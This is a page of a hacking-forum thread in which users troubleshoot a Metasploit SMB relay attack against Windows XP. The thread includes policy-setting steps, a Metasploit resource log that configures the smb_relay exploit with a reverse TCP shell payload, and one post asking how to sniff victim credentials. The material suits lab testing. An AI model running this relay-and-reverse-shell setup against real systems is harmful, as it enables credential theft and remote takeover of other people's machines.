Page 11 of 13 FirstFirst ... 910111213 LastLast
Results 101 to 110 of 122

Thread: Own Full patched XP box via HTTP

  1. #101
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default

    Great job, but I got the well-known error message, which starts so:
    "FAILED! The remote host has only provided us with Guest privileges...."
    Simple file checking: unticked
    #14: secpol.msc: edited
    The user, which is logged in has admistrator rights, etc...
    I made also another account, also with admin rights, but still get the error message.

    What else?

    DOMy
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  2. #102
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default

    I also tried to run Internet Explorer as an Administrator, and also with the "at" command (as the user SYSTEM)...

    None of them changed anything.
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  3. #103
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    post the output of msfconsole ???

    Code:
    5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.
    that is the only thing I can think that would cause that ..

    also look at my new toy
    http://forums.remote-exploit.org/showthread.php?p=94904

  4. #104
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    NM the GUEST error just means the it failed .. look for the error before the guest error ..

    Quote Originally Posted by operat0r View Post
    post the output of msfconsole ???

    Code:
    5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.
    that is the only thing I can think that would cause that ..

    also look at my new toy
    http://forums.remote-exploit.org/showthread.php?p=94904

  5. #105
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default It will not work

    It will not work if the victim ,have a good antivirus.Like KIS 2009.

  6. #106
    Member
    Join Date
    Sep 2008
    Posts
    306

    Default

    Quote Originally Posted by florin View Post
    It will not work if the victim ,have a good antivirus.Like KIS 2009.

    Join Date: Jun 2007
    Posts: 1


    And that is your first post?!
    Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:

    * post your question to a forum where it's off topic
    * post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
    * cross-post to too many different newsgroups
    * post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem

  7. #107
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    9

    Default What if

    What if we can hack without that condition :without obtaining victim credentials with ettercap filter.Maybe we can sniff victim credentials and use them with another type of exploit.And how can you hack somenone if he don't have simple file sharing unselected?

  8. #108
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    1

    Default

    Thank You people.... I will try the same and let you know the result

  9. #109
    Junior Member mRM3e's Avatar
    Join Date
    Oct 2008
    Posts
    28

    Default

    Im going to take a shot at this with service pack 2 and 3. Ill let you all know the outcome.

    mr_me
    I feel sorry for them - those who take authority as the truth and not truth as the authority -- Zeitgeist

  10. #110
    Junior Member mRM3e's Avatar
    Join Date
    Oct 2008
    Posts
    28

    Default

    I cannot seem to get this exploit working. I have edited the secpol.msc I have inputed the correct IPs into the filter and .rc file. For some reason I cant seem to bind to the service. I have tried alternate port numbers

    Code:
    resource> use exploit/windows/smb/smb_relay
    resource> set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    resource> set LHOST 192.168.0.5
    LHOST => 192.168.0.5
    resource> set LPORT 21
    LPORT => 21
    resource> exploit[*] Exploit running as background job.
    msf exploit(smb_relay) >[*] Handler binding to LHOST 192.168.0.5
    [-] Bind failed on 192.168.0.5[*] Handler binding to LHOST 0.0.0.0
    [-] Bind failed on 0.0.0.0
    [-] Exploit failed: The address is already in use (0.0.0.0:21).
    I am running xp sp2 on a virtual machine with bridge networking. If anyone could help that would be great however I will have another go tomorrow.

    mr_me
    I feel sorry for them - those who take authority as the truth and not truth as the authority -- Zeitgeist

Page 11 of 13 FirstFirst ... 910111213 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •